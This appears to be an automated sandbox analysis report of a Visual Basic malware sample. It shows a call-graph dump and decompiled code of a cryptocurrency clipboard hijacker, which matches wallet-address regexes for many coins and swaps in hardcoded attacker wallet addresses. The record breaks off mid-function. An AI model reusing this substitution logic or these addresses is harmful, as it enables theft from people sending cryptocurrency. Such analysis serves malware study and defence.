__vbaFreeVar 1676->1680 1683 4177c3 1677->1683 1684 4177b5 __vbaHresultCheckObj 1677->1684 1678->1677 1679->1659 1681 417882 __vbaVarDup 1680->1681 1682 417825 1680->1682 1685 4134fb 22 API calls 1681->1685 1686 417839 1682->1686 1687 41782b __vbaNew2 1682->1687 1683->1659 1688 4177ca __vbaNew2 1683->1688 1684->1683 1689 4178aa __vbaFreeVar 1685->1689 1694 41785b 1686->1694 1695 41784d __vbaHresultCheckObj 1686->1695 1687->1686 1688->1659 1690 41791a __vbaVarDup 1689->1690 1691 4178bd 1689->1691 1696 4134fb 22 API calls 1690->1696 1692 4178d1 1691->1692 1693 4178c3 __vbaNew2 1691->1693 1703 4178f3 1692->1703 1704 4178e5 __vbaHresultCheckObj 1692->1704 1693->1692 1694->1659 1697 417862 __vbaNew2 1694->1697 1695->1694 1698 417942 __vbaFreeVar 1696->1698 1697->1659 1699 4179b2 __vbaVarDup 1698->1699 1700 417955 1698->1700 1705 4134fb 22 API calls 1699->1705 1701 417969 1700->1701 1702 41795b __vbaNew2 1700->1702 1709 41798b 1701->1709 1710 41797d __vbaHresultCheckObj 1701->1710 1702->1701 1703->1659 1706 4178fa __vbaNew2 1703->1706 1704->1703 1707 4179db __vbaFreeVar 1705->1707 1706->1659 1707->1566 1708 4179f2 1707->1708 1711 4179f9 __vbaNew2 1708->1711 1712 417a0a 1708->1712 1709->1659 1713 417992 __vbaNew2 1709->1713 1710->1709 1711->1712 1714 417a2a 1712->1714 1715 417a1a __vbaHresultCheckObj 1712->1715 1713->1659 1714->1659 1716 417a31 __vbaNew2 1714->1716 1715->1714 1716->1659 1718 413660 1717->1718 1719 4136b0 __vbaVarCmpGe __vbaBoolVar 1718->1719 1720 413667 __vbaVarAdd __vbaVarMove __vbaNextEachVar 1718->1720 1721 4136e1 6 API calls 1719->1721 1720->1718 1721->1559 1723 4138c5 1722->1723 1724 414c37 7 API calls 1723->1724 1725 4138cd #617 __vbaVarTstEq __vbaFreeVar 1723->1725 1724->1564 1726 413f98 #617 __vbaVarTstEq __vbaFreeVar 1725->1726 1727 413918 #617 __vbaVarMove __vbaVarTstEq 1725->1727 1730 413fe2 #617 __vbaVarMove __vbaVarTstEq 1726->1730 1731 41462b #617 __vbaVarTstEq __vbaFreeVar 1726->1731 1729 41396c __vbaVarTstEq 1727->1729 1793 41395e __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr 1727->1793 1733 4139a3 __vbaVarTstEq 1729->1733 1729->1793 1736 414036 __vbaVarTstEq 1730->1736 1791 414028 __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr 1730->1791 1734 414be2 __vbaVarAdd __vbaVarMove __vbaNextEachVar 1731->1734 1735 414675 #617 __vbaVarMove __vbaVarTstEq 1731->1735 1737 4139da __vbaVarTstEq 1733->1737 1733->1793 1734->1723 1738 4146c9 __vbaVarTstEq 1735->1738 1795 4146bb __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr 1735->1795 1740 41406d __vbaVarTstEq 1736->1740 1736->1791 1742 413a11 __vbaVarTstEq 1737->1742 1737->1793 1744 414700 __vbaVarTstEq 1738->1744 1738->1795 1741 4140a4 __vbaVarTstEq 1740->1741 1740->1791 1745 4140db __vbaVarTstEq 1741->1745 1741->1791 1746 413a48 __vbaVarTstEq 1742->1746 1742->1793 1747 414737 __vbaVarTstEq 1744->1747 1744->1795 1748 414112 __vbaVarTstEq 1745->1748 1745->1791 1749 413a7f __vbaVarTstEq 1746->1749 1746->1793 1750 41476e __vbaVarTstEq 1747->1750 1747->1795 1751 414149 __vbaVarTstEq 1748->1751 1748->1791 1752 413ab6 __vbaVarTstEq 1749->1752 1749->1793 1753 4147a5 __vbaVarTstEq 1750->1753 1750->1795 1755 414180 __vbaVarTstEq 1751->1755 1751->1791 1756 413aed __vbaVarTstEq 1752->1756 1752->1793 1754 4147dc __vbaVarTstEq 1753->1754 1753->1795 1758 414813 __vbaVarTstEq 1754->1758 1754->1795 1759 4141b7 __vbaVarTstEq 1755->1759 1755->1791 1757 413b24 __vbaVarTstEq 1756->1757 1756->1793 1760 413b5b __vbaVarTstEq 1757->1760 1757->1793 1761 41484a __vbaVarTstEq 1758->1761 1758->1795 1762 4141e4 __vbaVarTstEq 1759->1762 1759->1791 1763 413b92 __vbaVarTstEq 1760->1763 1760->1793 1764 414881 __vbaVarTstEq 1761->1764 1761->1795 1765 41421b __vbaVarTstEq 1762->1765 1762->1791 1767 413bc9 __vbaVarTstEq 1763->1767 1763->1793 1768 4148b8 __vbaVarTstEq 1764->1768 1764->1795 1766 414252 __vbaVarTstEq 1765->1766 1765->1791 1769 414289 __vbaVarTstEq 1766->1769 1766->1791 1770 413c00 __vbaVarTstEq 1767->1770 1767->1793 1771 4148ef __vbaVarTstEq 1768->1771 1768->1795 1772 4142c0 __vbaVarTstEq 1769->1772 1769->1791 1773 413c37 __vbaVarTstEq 1770->1773 1770->1793 1774 414926 __vbaVarTstEq 1771->1774 1771->1795 1775 4142f7 __vbaVarTstEq 1772->1775 1772->1791 1776 413c6e __vbaVarTstEq 1773->1776 1773->1793 1777 41495d __vbaVarTstEq 1774->1777 1774->1795 1779 41432e __vbaVarTstEq 1775->1779 1775->1791 1780 413ca5 __vbaVarTstEq 1776->1780 1776->1793 1778 414994 __vbaVarTstEq 1777->1778 1777->1795 1782 4149cb __vbaVarTstEq 1778->1782 1778->1795 1783 414365 __vbaVarTstEq 1779->1783 1779->1791 1781 413cdc __vbaVarTstEq 1780->1781 1780->1793 1784 413d13 __vbaVarTstEq 1781->1784 1781->1793 1785 4149f8 __vbaVarTstEq 1782->1785 1782->1795 1786 41439c __vbaVarTstEq 1783->1786 1783->1791 1787 413d4a __vbaVarTstEq 1784->1787 1784->1793 1788 414a2f __vbaVarTstEq 1785->1788 1785->1795 1789 4143d3 __vbaVarTstEq 1786->1789 1786->1791 1792 413d81 __vbaVarTstEq 1787->1792 1787->1793 1794 414a66 __vbaVarTstEq 1788->1794 1788->1795 1790 41440a __vbaVarTstEq 1789->1790 1789->1791 1790->1791 1796 414441 __vbaVarTstEq 1790->1796 1791->1731 1792->1793 1797 413db8 __vbaVarTstEq 1792->1797 1793->1726 1794->1795 1798 414a9d __vbaVarTstEq 1794->1798 1795->1734 1796->1791 1799 414478 __vbaVarTstEq 1796->1799 1797->1793 1800 413def __vbaVarTstEq 1797->1800 1798->1795 1801 414ad4 __vbaVarTstEq 1798->1801 1799->1791 1802 4144af __vbaVarTstEq 1799->1802 1800->1793 1803 413e26 __vbaVarTstEq 1800->1803 1801->1795 1804 414b0b __vbaVarTstEq 1801->1804 1802->1791 1806 4144e6 __vbaVarTstEq 1802->1806 1803->1793 1807 413e5d __vbaVarTstEq 1803->1807 1804->1795 1805 414b3f __vbaVarTstEq 1804->1805 1805->1795 1809 414b73 __vbaVarTstEq 1805->1809 1806->1791 1810 41451d __vbaVarTstEq 1806->1810 1807->1793 1808 413e8a __vbaVarTstEq 1807->1808 1808->1793 1811 413ec1 __vbaVarTstEq 1808->1811 1809->1795 1810->1791 1812 414554 __vbaVarTstEq 1810->1812 1811->1793 1813 413ef5 __vbaVarTstEq 1811->1813 1812->1791 1814 414588 __vbaVarTstEq 1812->1814 1813->1793 1816 413f29 __vbaVarTstEq 1813->1816 1814->1791 1815 4145bc __vbaVarTstEq 1814->1815 1815->1791 1816->1793 1818 4165bc 1817->1818 1819 4165c4 10 API calls 1818->1819 1820 41668d 7 API calls 1818->1820 1819->1818 1820->1573 1828 41686c 1822->1828 1823 416874 #617 __vbaVarMove __vbaVarTstEq 1825 4168b4 __vbaVarTstEq 1823->1825 1823->1828 1824 41699a 7 API calls 1824->1590 1827 4168e2 __vbaVarTstEq 1825->1827 1825->1828 1827->1828 1828->1823 1828->1824 1829 416919 7 API calls 1828->1829 1829->1828 1831 414e58 1830->1831 1832 414e60 #617 __vbaVarTstEq __vbaFreeVar 1831->1832 1833 4160ee 7 API calls 1831->1833 1834 415599 #617 __vbaVarTstEq __vbaFreeVar 1832->1834 1835 414eab #617 __vbaVarMove __vbaVarTstEq 1832->1835 1833->1595 1837 415b50 #617 __vbaVarTstEq __vbaFreeVar 1834->1837 1838 4155e3 #617 __vbaVarMove __vbaVarTstEq 1834->1838 1839 414eff __vbaVarTstEq 1835->1839 1869 414ef1 __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr 1835->1869 1841 416099 __vbaVarAdd __vbaVarMove __vbaNextEachVar 1837->1841 1842 415b9a #617 __vbaVarMove __vbaVarTstEq 1837->1842 1840 415637 __vbaVarTstEq 1838->1840 1870 415629 __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr 1838->1870 1844 414f36 __vbaVarTstEq 1839->1844 1839->1869 1847 41566e __vbaVarTstEq 1840->1847 1840->1870 1841->1831 1848 415bee __vbaVarTstEq 1842->1848 1867 415be0 __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr 1842->1867 1845 414f6d __vbaVarTstEq 1844->1845 1844->1869 1852 414fa4 __vbaVarTstEq 1845->1852 1845->1869 1850 4156a5 __vbaVarTstEq 1847->1850 1847->1870 1851 415c25 __vbaVarTstEq 1848->1851 1848->1867 1853 4156dc __vbaVarTstEq 1850->1853 1850->1870 1854 415c5c __vbaVarTstEq 1851->1854 1851->1867 1855 414fdb __vbaVarTstEq 1852->1855 1852->1869 1856 415713 __vbaVarTstEq 1853->1856 1853->1870 1857 415c93 __vbaVarTstEq 1854->1857 1854->1867 1858 415012 __vbaVarTstEq 1855->1858 1855->1869 1859 41574a __vbaVarTstEq 1856->1859 1856->1870 1860 415cca __vbaVarTstEq 1857->1860 1857->1867 1861 415049 __vbaVarTstEq 1858->1861 1858->1869 1862 415781 __vbaVarTstEq 1859->1862 1859->1870 1863 415d01 __vbaVarTstEq 1860->1863 1860->1867 1864 415080 __vbaVarTstEq 1861->1864 1861->1869 1865 4157b8 __vbaVarTstEq 1862->1865 1862->1870 1866 415d38 __vbaVarTstEq 1863->1866 1863->1867 1868 4150b7 __vbaVarTstEq 1864->1868 1864->1869 1865->1870 1871 4157ef __vbaVarTstEq 1865->1871 1866->1867 1872 415d6f __vbaVarTstEq 1866->1872 1867->1841 1868->1869 1873 4150ee __vbaVarTstEq 1868->1873 1869->1834 1870->1837 1871->1870 1875 415826 __vbaVarTstEq 1871->1875 1872->1867 1876 415da6 __vbaVarTstEq 1872->1876 1873->1869 1874 415125 __vbaVarTstEq 1873->1874 1874->1869 1879 41515c __vbaVarTstEq 1874->1879 1875->1870 1877 415853 __vbaVarTstEq 1875->1877 1876->1867 1878 415ddd __vbaVarTstEq 1876->1878 1877->1870 1880 41588a __vbaVarTstEq 1877->1880 1878->1867 1881 415e14 __vbaVarTstEq 1878->1881 1879->1869 1882 415193 __vbaVarTstEq 1879->1882 1880->1870 1883 4158c1 __vbaVarTstEq 1880->1883 1881->1867 1884 415e4b __vbaVarTstEq 1881->1884 1882->1869 1885 4151ca __vbaVarTstEq 1882->1885 1883->1870 1886 4158f8 __vbaVarTstEq 1883->1886 1884->1867 1887 415e82 __vbaVarTstEq 1884->1887 1885->1869 1888 415201 __vbaVarTstEq 1885->1888 1886->1870 1889 41592f __vbaVarTstEq 1886->1889 1887->1867 1890 415eb9 __vbaVarTstEq 1887->1890 1888->1869 1891 415238 __vbaVarTstEq 1888->1891 1889->1870 1892 415966 __vbaVarTstEq 1889->1892 1890->1867 1893 415ef0 __vbaVarTstEq 1890->1893 1891->1869 1894 41526f __vbaVarTstEq 1891->1894 1892->1870 1895 41599d __vbaVarTstEq 1892->1895 1893->1867 1896 415f1d __vbaVarTstEq 1893->1896 1894->1869 1897 4152a6 __vbaVarTstEq 1894->1897 1895->1870 1899 4159d4 __vbaVarTstEq 1895->1899 1896->1867 1900 415f54 __vbaVarTstEq 1896->1900 1897->1869 1898 4152dd __vbaVarTstEq 1897->1898 1898->1869 1903 415314 __vbaVarTstEq 1898->1903 1899->1870 1901 415a0b __vbaVarTstEq 1899->1901 1900->1867 1902 415f8b __vbaVarTstEq 1900->1902 1901->1870 1904 415a42 __vbaVarTstEq 1901->1904 1902->1867 1905 415fc2 __vbaVarTstEq 1902->1905 1903->1869 1906 41534b __vbaVarTstEq 1903->1906 1904->1870 1907 415a79 __vbaVarTstEq 1904->1907 1905->1867 1908 415ff6 __vbaVarTstEq 1905->1908 1906->1869 1909 415382 __vbaVarTstEq 1906->1909 1907->1870 1910 415aad __vbaVarTstEq 1907->1910 1908->1867 1911 41602a __vbaVarTstEq 1908->1911 1909->1869 1912 4153af __vbaVarTstEq 1909->1912 1910->1870 1913 415ae1 __vbaVarTstEq 1910->1913 1911->1867 1912->1869 1914 4153e6 __vbaVarTstEq 1912->1914 1913->1870 1914->1869 1915 41541d __vbaVarTstEq 1914->1915 1915->1869 1916 415454 __vbaVarTstEq 1915->1916 1916->1869 1917 41548b __vbaVarTstEq 1916->1917 1917->1869 1918 4154c2 __vbaVarTstEq 1917->1918 1918->1869 1919 4154f6 __vbaVarTstEq 1918->1919 1919->1869 1920 41552a __vbaVarTstEq 1919->1920 1920->1869 1928 416b79 1921->1928 1922 416b81 #617 __vbaVarMove __vbaVarTstEq 1924 416bcf __vbaVarTstEq 1922->1924 1922->1928 1923 416f25 7 API calls 1923->1604 1927 416c00 __vbaVarTstEq 1924->1927 1924->1928 1926 416ea4 7 API calls 1926->1928 1927->1928 1929 416c31 __vbaVarTstEq 1927->1929 1928->1922 1928->1923 1928->1926 1929->1928 1930 416c58 __vbaVarTstEq 1929->1930 1930->1928 1931 416c89 __vbaVarTstEq 1930->1931 1931->1928 1932 416cba __vbaVarTstEq 1931->1932 1932->1928 1933 416ceb __vbaVarTstEq 1932->1933 1933->1928 1934 416d1c __vbaVarTstEq 1933->1934 1934->1928 1935 416d4d __vbaVarTstEq 1934->1935 1935->1928 1936 416d7e __vbaVarTstEq 1935->1936 1936->1928 1937 416daf __vbaVarTstEq 1936->1937 1937->1928 1938 416de0 __vbaVarTstEq 1937->1938 1938->1928 1939 416e11 __vbaVarTstEq 1938->1939 1939->1928 1940 416e3f __vbaVarTstEq 1939->1940 1940->1928 1941 416e6d __vbaVarTstEq 1940->1941 1941->1928 1943 4162fd 1942->1943 1944 416305 #617 __vbaVarTstEq __vbaFreeVar 1943->1944 1945 4163db 6 API calls 1943->1945 1947 41635c 7 API calls 1943->1947 1944->1943 1945->1627 1947->1943 1948 40143c #100

              Executed Functions

              C-Code - Quality: 68%
              			E00416F91(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				char _v68;
				char* _v76;
				signed int _v84;
				intOrPtr* _v92;
				char _v100;
				void* _v104;
				intOrPtr _v172;
				void* _t400;
				short _t403;
				short _t406;
				short _t409;
				short _t412;
				short _t415;
				short _t418;
				short _t421;
				short _t424;
				short _t427;
				short _t430;
				short _t433;
				short _t436;
				short _t439;
				short _t442;
				short _t445;
				short _t448;
				short _t451;
				short _t454;
				short _t457;
				intOrPtr* _t458;
				void* _t459;
				intOrPtr* _t460;
				void* _t464;
				void* _t468;
				void* _t472;
				void* _t476;
				void* _t480;
				void* _t484;
				void* _t488;
				void* _t492;
				void* _t496;
				void* _t502;
				void* _t506;
				void* _t516;
				intOrPtr* _t611;
				char* _t613;
				intOrPtr* _t615;
				intOrPtr* _t616;
				intOrPtr* _t617;
				intOrPtr* _t618;
				intOrPtr* _t619;
				intOrPtr* _t620;
				intOrPtr* _t621;
				intOrPtr* _t622;
				intOrPtr* _t623;
				intOrPtr* _t624;
				intOrPtr* _t625;
				intOrPtr* _t626;
				intOrPtr _t629;
				void* _t633;
				intOrPtr _t634;

				_t634 = _t633 - 0xc;
				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t634;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = _t634 - 0x94;
				_v12 = 0x401238;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				 *0x419024 = 0;
				_v172 =  *_a4;
				L00401328();
				if(_v48 == 0) {
					_push( &_v48);
					_push(0x412750); // executed
					L0040131C(); // executed
				}
				_t611 = _v48;
				_t400 =  *((intOrPtr*)( *_t611 + 0x30))(_t611, 0xffffffff);
				asm("fclex");
				if(_t400 < 0) {
					_push(0x30);
					_push(0x412740);
					_push(_t611);
					_push(_t400);
					L00401322();
				}
				_t629 = 8;
				_v76 = 0x411cd8;
				_v84 = _t629;
				L00401394();
				_v92 = 0x419028;
				_v100 = 0x4008;
				_v76 = L"\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\\b";
				_v84 = _t629;
				L00401376();
				_t403 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
				_v104 = _t403;
				L00401352();
				_v92 = 0x419028;
				_v100 = 0x4008;
				if(_v104 == 0) {
					_v76 = L"\\b0x[a-fA-F0-9]{40}\\b";
					_v84 = _t629;
					L00401376();
					_t406 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
					_v104 = _t406;
					L00401352();
					_v92 = 0x419028;
					_v100 = 0x4008;
					if(_v104 == 0) {
						_v76 = L"\\b4([0-9]|[A-J])(.){93,106}\\b";
						_v84 = _t629;
						L00401376();
						_t409 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
						_v104 = _t409;
						L00401352();
						if(_v104 == 0) {
							_v92 = 0x419028;
							_v100 = 0x4008;
							_v76 = L"\\b((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}\\b";
							_v84 = _t629;
							L00401376();
							_t412 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
							_v104 = _t412;
							L00401352();
							_v92 = 0x419028;
							_v100 = 0x4008;
							if(_v104 == 0) {
								_v76 = L"\\b(ltc1|[LM])[a-zA-HJ-NP-Z0-9]{26,40}\\b";
								_v84 = _t629;
								L00401376();
								_t415 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
								_v104 = _t415;
								L00401352();
								_v92 = 0x419028;
								_v100 = 0x4008;
								if(_v104 == 0) {
									_v76 = L"\\bD{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}\\b";
									_v84 = _t629;
									L00401376();
									_t418 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
									_v104 = _t418;
									L00401352();
									_v92 = 0x419028;
									_v100 = 0x4008;
									if(_v104 == 0) {
										_v76 = L"\\bX[1-9A-HJ-NP-Za-km-z]{33}\\b";
										_v84 = _t629;
										L00401376();
										_t421 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
										_v104 = _t421;
										L00401352();
										if(_v104 == 0) {
											_v92 = 0x419028;
											_v100 = 0x4008;
											_v76 = L"\\bA[0-9a-zA-Z]{33}\\b";
											_v84 = _t629;
											L00401376();
											_t424 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
											_v104 = _t424;
											L00401352();
											if(_v104 == 0) {
												_v92 = 0x419028;
												_v100 = 0x4008;
												_v76 = L"\\b(DdzFF.*)|(addr1.*)|(Ae2.*)\\b";
												_v84 = _t629;
												L00401376();
												_t427 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
												_v104 = _t427;
												L00401352();
												_v92 = 0x419028;
												_v100 = 0x4008;
												if(_v104 == 0) {
													_v76 = L"\\b(4|8)?[0-9A-Z]{1}[0-9a-zA-Z]{93}([0-9a-zA-Z]{11})?\\b";
													_v84 = _t629;
													L00401376();
													_t430 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
													_v104 = _t430;
													L00401352();
													if(_v104 == 0) {
														_v92 = 0x419028;
														_v100 = 0x4008;
														_v76 = L"\\bT[0-9a-zA-Z]{33}\\b";
														_v84 = _t629;
														L00401376();
														_t433 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
														_v104 = _t433;
														L00401352();
														if(_v104 == 0) {
															_v92 = 0x419028;
															_v100 = 0x4008;
															_v76 = L"\\bbnb[0-9a-zA-Z]{39}\\b";
															_v84 = _t629;
															L00401376();
															_t436 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
															_v104 = _t436;
															L00401352();
															if(_v104 == 0) {
																_v92 = 0x419028;
																_v100 = 0x4008;
																_v76 = L"\\br[0-9a-zA-Z]{33}\\b";
																_v84 = _t629;
																L00401376();
																_t439 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
																_v104 = _t439;
																L00401352();
																if(_v104 == 0) {
																	_v92 = 0x419028;
																	_v100 = 0x4008;
																	_v76 = L"\\b1[0-9a-zA-Z]{46,47}\\b";
																	_v84 = _t629;
																	L00401376();
																	_t442 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
																	_v104 = _t442;
																	L00401352();
																	if(_v104 == 0) {
																		_v92 = 0x419028;
																		_v100 = 0x4008;
																		_v76 = L"\\bG[0-9a-zA-Z]{55}\\b";
																		_v84 = _t629;
																		L00401376();
																		_t445 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
																		_v104 = _t445;
																		L00401352();
																		if(_v104 == 0) {
																			_v92 = 0x419028;
																			_v100 = 0x4008;
																			_v76 = L"\\b[0-9a-zA-Z]{44}\\b";
																			_v84 = _t629;
																			L00401376();
																			_t448 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
																			_v104 = _t448;
																			L00401352();
																			if(_v104 == 0) {
																				_v92 = 0x419028;
																				_v100 = 0x4008;
																				_v76 = L"\\bV[0-9a-zA-Z]{33,42}\\b";
																				_v84 = _t629;
																				L00401376();
																				_t451 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
																				_v104 = _t451;
																				L00401352();
																				if(_v104 == 0) {
																					_v92 = 0x419028;
																					_v100 = 0x4008;
																					_v76 = L"\\bdgb[0-9a-zA-Z]{40}\\b";
																					_v84 = _t629;
																					L00401376();
																					_t454 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
																					_v104 = _t454;
																					L00401352();
																					if(_v104 == 0) {
																						_v100 = 0x4008;
																						_t613 = L"^(?!addr.*).{58}$";
																						_v92 = 0x419028;
																						_v76 = _t613;
																						_v84 = _t629;
																						L00401376();
																						_t457 = E004134FB(0x419028,  &_v68, _t613, _t629,  &_v68,  &_v100); // executed
																						_v104 = _t457;
																						L00401352();
																						if(_v104 != 0) {
																							_t458 = _v48;
																							if(_t458 == 0) {
																								_push( &_v48);
																								_push(0x412750);
																								L0040131C();
																								_t458 = _v48;
																							}
																							_v104 = _t458;
																							_t459 =  *((intOrPtr*)( *_t458 + 0x20))(_t458, _t613);
																							asm("fclex");
																							if(_t459 < 0) {
																								_push(0x20);
																								_push(0x412740);
																								_push(_v104);
																								_push(_t459);
																								L00401322();
																							}
																							_t460 = _v48;
																							if(_t460 == 0) {
																								_push( &_v48);
																								_push(0x412750);
																								L0040131C();
																								_t460 = _v48;
																							}
																							_v104 = _t460;
																							_v76 = L"XIXWLMD7DIAHQQ6TQOFMVS5JTBS6IXVFY4KHENNWQUWM7TL7GE27IW67JM";
																							goto L121;
																						}
																					} else {
																						if(_v48 == 0) {
																							_push( &_v48);
																							_push(0x412750);
																							L0040131C();
																						}
																						_t615 = _v48;
																						_t464 =  *((intOrPtr*)( *_t615 + 0x20))(_t615, L"\\bdgb[0-9a-zA-Z]{40}\\b");
																						asm("fclex");
																						if(_t464 < 0) {
																							_push(0x20);
																							_push(0x412740);
																							_push(_t615);
																							_push(_t464);
																							L00401322();
																						}
																						_t460 = _v48;
																						if(_t460 == 0) {
																							_push( &_v48);
																							_push(0x412750);
																							L0040131C();
																							_t460 = _v48;
																						}
																						_v104 = _t460;
																						_v76 = L"dgb1qq4mmfkgjxkg40y9p568nm396syq5x7cxpljjs7";
																						goto L121;
																					}
																				} else {
																					if(_v48 == 0) {
																						_push( &_v48);
																						_push(0x412750);
																						L0040131C();
																					}
																					_t616 = _v48;
																					_t468 =  *((intOrPtr*)( *_t616 + 0x20))(_t616, L"\\bV[0-9a-zA-Z]{33,42}\\b");
																					asm("fclex");
																					if(_t468 < 0) {
																						_push(0x20);
																						_push(0x412740);
																						_push(_t616);
																						_push(_t468);
																						L00401322();
																					}
																					_t460 = _v48;
																					if(_t460 == 0) {
																						_push( &_v48);
																						_push(0x412750);
																						L0040131C();
																						_t460 = _v48;
																					}
																					_v104 = _t460;
																					_v76 = L"VaxnygQcu3SgKp7hEZ79mF5wDGm22yp2zo";
																					goto L121;
																				}
																			} else {
																				if(_v48 == 0) {
																					_push( &_v48);
																					_push(0x412750);
																					L0040131C();
																				}
																				_t617 = _v48;
																				_t472 =  *((intOrPtr*)( *_t617 + 0x20))(_t617, L"\\b[0-9a-zA-Z]{44}\\b");
																				asm("fclex");
																				if(_t472 < 0) {
																					_push(0x20);
																					_push(0x412740);
																					_push(_t617);
																					_push(_t472);
																					L00401322();
																				}
																				_t460 = _v48;
																				if(_t460 == 0) {
																					_push( &_v48);
																					_push(0x412750);
																					L0040131C();
																					_t460 = _v48;
																				}
																				_v104 = _t460;
																				_v76 = L"AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4";
																				goto L121;
																			}
																		} else {
																			if(_v48 == 0) {
																				_push( &_v48);
																				_push(0x412750);
																				L0040131C();
																			}
																			_t618 = _v48;
																			_t476 =  *((intOrPtr*)( *_t618 + 0x20))(_t618, L"\\bG[0-9a-zA-Z]{55}\\b");
																			asm("fclex");
																			if(_t476 < 0) {
																				_push(0x20);
																				_push(0x412740);
																				_push(_t618);
																				_push(_t476);
																				L00401322();
																			}
																			_t460 = _v48;
																			if(_t460 == 0) {
																				_push( &_v48);
																				_push(0x412750);
																				L0040131C();
																				_t460 = _v48;
																			}
																			_v104 = _t460;
																			_v76 = L"GDQHVF35R5DW5TH5QRF5XA754UABPCEVKKHPTPE3HXIMU5XOE5G5ZLDG";
																			goto L121;
																		}
																	} else {
																		if(_v48 == 0) {
																			_push( &_v48);
																			_push(0x412750);
																			L0040131C();
																		}
																		_t619 = _v48;
																		_t480 =  *((intOrPtr*)( *_t619 + 0x20))(_t619, L"\\b1[0-9a-zA-Z]{46,47}\\b");
																		asm("fclex");
																		if(_t480 < 0) {
																			_push(0x20);
																			_push(0x412740);
																			_push(_t619);
																			_push(_t480);
																			L00401322();
																		}
																		_t460 = _v48;
																		if(_t460 == 0) {
																			_push( &_v48);
																			_push(0x412750);
																			L0040131C();
																			_t460 = _v48;
																		}
																		_v104 = _t460;
																		_v76 = L"15hXAH4wYrCKz3R2MVRTaY3y8yqMePHova2KCwvQGd2shLDz";
																		goto L121;
																	}
																} else {
																	if(_v48 == 0) {
																		_push( &_v48);
																		_push(0x412750);
																		L0040131C();
																	}
																	_t620 = _v48;
																	_t484 =  *((intOrPtr*)( *_t620 + 0x20))(_t620, L"\\br[0-9a-zA-Z]{33}\\b");
																	asm("fclex");
																	if(_t484 < 0) {
																		_push(0x20);
																		_push(0x412740);
																		_push(_t620);
																		_push(_t484);
																		L00401322();
																	}
																	_t460 = _v48;
																	if(_t460 == 0) {
																		_push( &_v48);
																		_push(0x412750);
																		L0040131C();
																		_t460 = _v48;
																	}
																	_v104 = _t460;
																	_v76 = L"rpQEW6WqhvuqqxfqPUhwA5s8zPENVddUBi";
																	goto L121;
																}
															} else {
																if(_v48 == 0) {
																	_push( &_v48);
																	_push(0x412750);
																	L0040131C();
																}
																_t621 = _v48;
																_t488 =  *((intOrPtr*)( *_t621 + 0x20))(_t621, L"\\bbnb[0-9a-zA-Z]{39}\\b");
																asm("fclex");
																if(_t488 < 0) {
																	_push(0x20);
																	_push(0x412740);
																	_push(_t621);
																	_push(_t488);
																	L00401322();
																}
																_t460 = _v48;
																if(_t460 == 0) {
																	_push( &_v48);
																	_push(0x412750);
																	L0040131C();
																	_t460 = _v48;
																}
																_v104 = _t460;
																_v76 = L"bnb1sy8wkqcayfpax9tn3wj8rmtd9pdw2asq0dd0xd";
																goto L121;
															}
														} else {
															if(_v48 == 0) {
																_push( &_v48);
																_push(0x412750);
																L0040131C();
															}
															_t622 = _v48;
															_t492 =  *((intOrPtr*)( *_t622 + 0x20))(_t622, L"\\bT[0-9a-zA-Z]{33}\\b");
															asm("fclex");
															if(_t492 < 0) {
																_push(0x20);
																_push(0x412740);
																_push(_t622);
																_push(_t492);
																L00401322();
															}
															_t460 = _v48;
															if(_t460 == 0) {
																_push( &_v48);
																_push(0x412750);
																L0040131C();
																_t460 = _v48;
															}
															_v104 = _t460;
															_v76 = L"THYmz75uHVVbuJGGy2dv6BVy1W2iA8rqfm";
															goto L121;
														}
													} else {
														if(_v48 == 0) {
															_push( &_v48);
															_push(0x412750);
															L0040131C();
														}
														_t623 = _v48;
														_t496 =  *((intOrPtr*)( *_t623 + 0x20))(_t623, L"\\b(4|8)?[0-9A-Z]{1}[0-9a-zA-Z]{93}([0-9a-zA-Z]{11})?\\b");
														asm("fclex");
														if(_t496 < 0) {
															_push(0x20);
															_push(0x412740);
															_push(_t623);
															_push(_t496);
															L00401322();
														}
														_t460 = _v48;
														if(_t460 == 0) {
															_push( &_v48);
															_push(0x412750);
															L0040131C();
															_t460 = _v48;
														}
														_v104 = _t460;
